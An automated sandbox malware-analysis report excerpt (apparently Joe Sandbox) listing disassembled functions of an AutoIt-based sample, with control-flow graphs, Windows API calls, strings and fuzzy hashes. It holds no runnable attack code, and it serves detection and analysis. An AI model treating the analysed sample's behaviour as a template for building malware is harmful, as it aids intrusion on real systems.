                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00CE36D5
                                                                                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CE36E4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                  • Opcode ID: 4edf15cdb82ff1ba4db1b672cda321f3a99c424fccd4a4fa993f095b729e6e83
                                                                                                                                                                                                                                                                  • Instruction ID: 8298d46547ae442dfd2cd4f2be04d09c37d12bbc99840c13e3ad79463e2e8075
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4edf15cdb82ff1ba4db1b672cda321f3a99c424fccd4a4fa993f095b729e6e83
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C021E4B2941318EFDF009F94EC89BADBBB5FB08710F10521AE519E63A0E7B545848FA0
                                                                                                                                                                                                                                                                  Function 00D209DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 369 d209db-d20a0b call d207af 372 d20a26-d20a32 call d15594 369->372 373 d20a0d-d20a18 call d0f636 369->373 379 d20a34-d20a49 call d0f636 call d0f649 372->379 380 d20a4b-d20a94 call d2071a 372->380 378 d20a1a-d20a21 call d0f649 373->378 389 d20cfd-d20d03 378->389 379->378 387 d20b01-d20b0a GetFileType 380->387 388 d20a96-d20a9f 380->388 393 d20b53-d20b56 387->393 394 d20b0c-d20b3d GetLastError call d0f613 CloseHandle 387->394 391 d20aa1-d20aa5 388->391 392 d20ad6-d20afc GetLastError call d0f613 388->392 391->392 398 d20aa7-d20ad4 call d2071a 391->398 392->378 396 d20b58-d20b5d 393->396 397 d20b5f-d20b65 393->397 394->378 408 d20b43-d20b4e call d0f649 394->408 401 d20b69-d20bb7 call d154dd 396->401 397->401 402 d20b67 397->402 398->387 398->392 412 d20bc7-d20beb call d204cd 401->412 413 d20bb9-d20bc5 call d2092b 401->413 402->401 408->378 419 d20bfe-d20c41 412->419 420 d20bed 412->420 413->412 418 d20bef-d20bf9 call d18a2e 413->418 418->389 422 d20c62-d20c70 419->422 423 d20c43-d20c47 419->423 420->418 426 d20c76-d20c7a 422->426 427 d20cfb 422->427 423->422 425 d20c49-d20c5d 423->425 425->422 426->427 428 d20c7c-d20caf CloseHandle call d2071a 426->428 427->389 431 d20ce3-d20cf7 428->431 432 d20cb1-d20cdd GetLastError call d0f613 call d156a6 428->432 431->427 432->431
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D2071A: CreateFileW.KERNEL32(00000000,00000000,?,00D20A84,?,?,00000000,?,00D20A84,00000000,0000000C), ref: 00D20737
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20AEF
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20AF6
                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 00D20B02
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20B0C
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20B15
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D20B35
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D20C7F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20CB1
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20CB8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                  • Opcode ID: c8b892d6d161f7823cf26825a18913e15876b8c55fdd4e039548e22059400f24
                                                                                                                                                                                                                                                                  • Instruction ID: 50ccc813c2ef43e29fd7257821d2d08ee66040c66763a8db94f055e920156c7c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b892d6d161f7823cf26825a18913e15876b8c55fdd4e039548e22059400f24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34A106329002149FDF29AF68E851BAD7FA1EF1A328F280159F815DB3D2D7319952CB71
                                                                                                                                                                                                                                                                  Function 00CE52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00CE55B2
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CE525A
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00CE53C4
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D24BFD
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D24C3E
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D24C80
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D24CE7
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D24CF6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                  • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                  • Opcode ID: fe01242fd22da5805734aa4238935e2ad5e05d7d35f0a79f6cecc42aeb7045e2
                                                                                                                                                                                                                                                                  • Instruction ID: 5b59399edb1f54003565361cbe6fe46fb2f367cd8e80591ee0c305cb8fb8b7ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe01242fd22da5805734aa4238935e2ad5e05d7d35f0a79f6cecc42aeb7045e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8715C71505341DEC304EF6AE8819ABBBF8FF58340F80452DF555C62A0EB719A49EB72
                                                                                                                                                                                                                                                                  Function 00CE34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CE34DE
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00CE34ED
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00CE3503
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00CE3515
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00CE3527
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CE353F
                                                                                                                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00CE3590
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: GetSysColorBrush.USER32(0000000F), ref: 00CE3657
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: RegisterClassExW.USER32(00000030), ref: 00CE3681
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CE3692
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: InitCommonControlsEx.COMCTL32(?), ref: 00CE36AF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CE36BF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: LoadIconW.USER32(000000A9), ref: 00CE36D5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CE36E4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                  • Opcode ID: 10fe9bb4937d05c6cc17a8be6a52cde328d405353e7fb470e86ce8e91d266753
                                                                                                                                                                                                                                                                  • Instruction ID: 461a20c15e489f35febaff2ccead7c32813fdff7eac96b8900f0e2acc351bacc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10fe9bb4937d05c6cc17a8be6a52cde328d405353e7fb470e86ce8e91d266753
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA213972D00358EBDB109FA5EC49AA9BFF5FB08B50F00451EE608E63A0D3B915858FB0
                                                                                                                                                                                                                                                                  Function 00D60FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 510 d60fb8-d60fef call cee6a0 513 d60ff1-d60ffe call cec98d 510->513 514 d6100f-d61021 WSAStartup 510->514 513->514 523 d61000-d6100b call cec98d 513->523 516 d61054-d61091 call cfc1f6 call ce8ec0 call cff9d4 inet_addr gethostbyname 514->516 517 d61023-d61031 514->517 533 d610a2-d610b0 516->533 534 d61093-d610a0 IcmpCreateFile 516->534 520 d61036-d61046 517->520 521 d61033 517->521 524 d6104b-d6104f 520->524 525 d61048 520->525 521->520 523->514 528 d61249-d61251 524->528 525->524 536 d610b5-d610c5 533->536 537 d610b2 533->537 534->533 535 d610d3-d61100 call d0017b call ce423c 534->535 546 d61102-d61129 IcmpSendEcho 535->546 547 d6112b-d61148 IcmpSendEcho 535->547 538 d610c7 536->538 539 d610ca-d610ce 536->539 537->536 538->539 541 d61240-d61244 call cebd98 539->541 541->528 548 d6114c-d6114e 546->548 547->548 549 d61150-d61155 548->549 550 d611ae-d611bc 548->550 553 d6115b-d61160 549->553 554 d611f8-d6120a call cee6a0 549->554 551 d611c1-d611c8 550->551 552 d611be 550->552 555 d611e4-d611ed 551->555 552->551 556 d61162-d61167 553->556 557 d611ca-d611d8 553->557 568 d61210 554->568 569 d6120c-d6120e 554->569 561 d611f2-d611f6 555->561 562 d611ef 555->562 556->550 563 d61169-d6116e 556->563 559 d611dd 557->559 560 d611da 557->560 559->555 560->559 565 d61212-d61229 IcmpCloseHandle WSACleanup 561->565 562->561 566 d61193-d611a1 563->566 567 d61170-d61175 563->567 565->541 573 d6122b-d6123d call d0013d call d00184 565->573 571 d611a6-d611ac 566->571 572 d611a3 566->572 567->557 570 d61177-d61185 567->570 568->565 569->565 574 d61187 570->574 575 d6118a-d61191 570->575 571->555 572->571 573->541 574->575 575->555
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00D61019
                                                                                                                                                                                                                                                                  • inet_addr.WSOCK32(?), ref: 00D61079
                                                                                                                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00D61085
                                                                                                                                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00D61093
                                                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D61123
                                                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D61142
                                                                                                                                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00D61216
                                                                                                                                                                                                                                                                  • WSACleanup.WSOCK32 ref: 00D6121C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                  • String ID: Ping
                                                                                                                                                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                  • Opcode ID: 6b7444f496fe2437bc9620098006a214b14aec2a83d5e77615d5ca7933757b91
                                                                                                                                                                                                                                                                  • Instruction ID: 57d1bb2e1b39b7642dd8807aae3c3bfb97d2a358db58d49609514bcaebc084fa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b7444f496fe2437bc9620098006a214b14aec2a83d5e77615d5ca7933757b91
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D691CC35604341AFD720CF25C889B16BBE0BF49318F1885A8F569CB7A2C734ED85CBA1
                                                                                                                                                                                                                                                                  Function 00CE370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 580 ce370f-ce3724 581 ce3726-ce3729 580->581 582 ce3784-ce3786 580->582 583 ce378a 581->583 584 ce372b-ce3732 581->584 582->581 585 ce3788 582->585 589 d23df4-d23e1c call ce2f92 call cff23c 583->589 590 ce3790-ce3795 583->590 586 ce3738-ce373d 584->586 587 ce3804-ce380c PostQuitMessage 584->587 588 ce376f-ce3777 DefWindowProcW 585->588 591 d23e61-d23e75 call d4c8f7 586->591 592 ce3743-ce3747 586->592 595 ce37b8-ce37ba 587->595 594 ce377d-ce3783 588->594 626 d23e21-d23e28 589->626 596 ce37bc-ce37e3 SetTimer RegisterWindowMessageW 590->596 597 ce3797-ce379a 590->597 591->595 619 d23e7b 591->619 600 ce380e-ce3818 call cffcad 592->600 601 ce374d-ce3752 592->601 595->594 596->595 602 ce37e5-ce37f0 CreatePopupMenu 596->602 598 d23d95-d23d98 597->598 599 ce37a0-ce37b3 KillTimer call ce3907 call ce59ff 597->599 611 d23dd0-d23def MoveWindow 598->611 612 d23d9a-d23d9e 598->612 599->595 621 ce381d 600->621 606 d23e46-d23e4d 601->606 607 ce3758-ce375d 601->607 602->595 606->588 616 d23e53-d23e5c call d41423 606->616 617 ce37f2-ce3802 call ce381f 607->617 618 ce3763-ce3769 607->618 611->595 613 d23da0-d23da3 612->613 614 d23dbf-d23dcb SetFocus 612->614 613->618 622 d23da9-d23dba call ce2f92 613->622 614->595 616->588 617->595 618->588 618->626 619->588 621->595 622->595 626->588 630 d23e2e-d23e41 call ce3907 call ce396b 626->630 630->588
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00CE3709,?,?), ref: 00CE3777
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00CE3709,?,?), ref: 00CE37A3
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CE37C6
                                                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00CE3709,?,?), ref: 00CE37D1
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00CE37E5
                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00CE3806
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                  • Opcode ID: f5ebcfda3c367b03dc5c3c20bd69dc1a52e962cb98af6b584aaceaca217e3fff
                                                                                                                                                                                                                                                                  • Instruction ID: a35ba7869bb1dca7970bb7355f5aa7496f61696d68621d06b0cb4dabac8ec2f2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ebcfda3c367b03dc5c3c20bd69dc1a52e962cb98af6b584aaceaca217e3fff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6241E4F22443C4FBDB182B6A9E4DBB93BA6EB50300F040229F516C7391DA79BB449771
                                                                                                                                                                                                                                                                  Function 00D190C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 636 d190c5-d190d5 637 d190d7-d190ea call d0f636 call d0f649 636->637 638 d190ef-d190f1 636->638 655 d19471 637->655 640 d190f7-d190fd 638->640 641 d19459-d19466 call d0f636 call d0f649 638->641 640->641 642 d19103-d1912e 640->642 657 d1946c call d12b5c 641->657 642->641 645 d19134-d1913d 642->645 648 d19157-d19159 645->648 649 d1913f-d19152 call d0f636 call d0f649 645->649 653 d19455-d19457 648->653 654 d1915f-d19163 648->654 649->657 658 d19474-d19479 653->658 654->653 660 d19169-d1916d 654->660 655->658 657->655 660->649 663 d1916f-d19186 660->663 665 d191a3-d191ac 663->665 666 d19188-d1918b 663->666 669 d191ca-d191d4 665->669 670 d191ae-d191c5 call d0f636 call d0f649 call d12b5c 665->670 667 d19195-d1919e 666->667 668 d1918d-d19193 666->668 674 d1923f-d19259 667->674 668->667 668->670 672 d191d6-d191d8 669->672 673 d191db-d191dc call d13b93 669->673 699 d1938c 670->699 672->673 682 d191e1-d191f9 call d12d38 * 2 673->682 676 d1932d-d19336 call d1fc1b 674->676 677 d1925f-d1926f 674->677 688 d193a9 676->688 689 d19338-d1934a 676->689 677->676 681 d19275-d19277 677->681 681->676 685 d1927d-d192a3 681->685 709 d19216-d1923c call d197a4 682->709 710 d191fb-d19211 call d0f649 call d0f636 682->710 685->676 690 d192a9-d192bc 685->690 692 d193ad-d193c5 ReadFile 688->692 689->688 694 d1934c-d1935b GetConsoleMode 689->694 690->676 695 d192be-d192c0 690->695 697 d19421-d1942c GetLastError 692->697 698 d193c7-d193cd 692->698 694->688 700 d1935d-d19361 694->700 695->676 701 d192c2-d192ed 695->701 703 d19445-d19448 697->703 704 d1942e-d19440 call d0f649 call d0f636 697->704 698->697 705 d193cf 698->705 707 d1938f-d19399 call d12d38 699->707 700->692 706 d19363-d1937d ReadConsoleW 700->706 701->676 708 d192ef-d19302 701->708 717 d19385-d1938b call d0f613 703->717 718 d1944e-d19450 703->718 704->699 713 d193d2-d193e4 705->713 715 d1937f GetLastError 706->715 716 d1939e-d193a7 706->716 707->658 708->676 720 d19304-d19306 708->720 709->674 710->699 713->707 724 d193e6-d193ea 713->724 715->717 716->713 717->699 718->707 720->676 721 d19308-d19328 720->721 721->676 730 d19403-d1940e 724->730 731 d193ec-d193fc call d18de1 724->731 736 d19410 call d18f31 730->736 737 d1941a-d1941f call d18c21 730->737 742 d193ff-d19401 731->742 743 d19415-d19418 736->743 737->743 742->707 743->742
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4abeb1572527a5a30d8505edf8cf76377c22131422cb086d0e23cbc37502313e
                                                                                                                                                                                                                                                                  • Instruction ID: 14d9cfbccec41ed9e428d5ddc8598e4fbeba97c28a353e2d627037ed791021a6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4abeb1572527a5a30d8505edf8cf76377c22131422cb086d0e23cbc37502313e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55C1E175A04349BFDB11DFA8E865BEDBBB0BF09310F580159E464A7392CB319982CB70
                                                                                                                                                                                                                                                                  Function 00CFAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
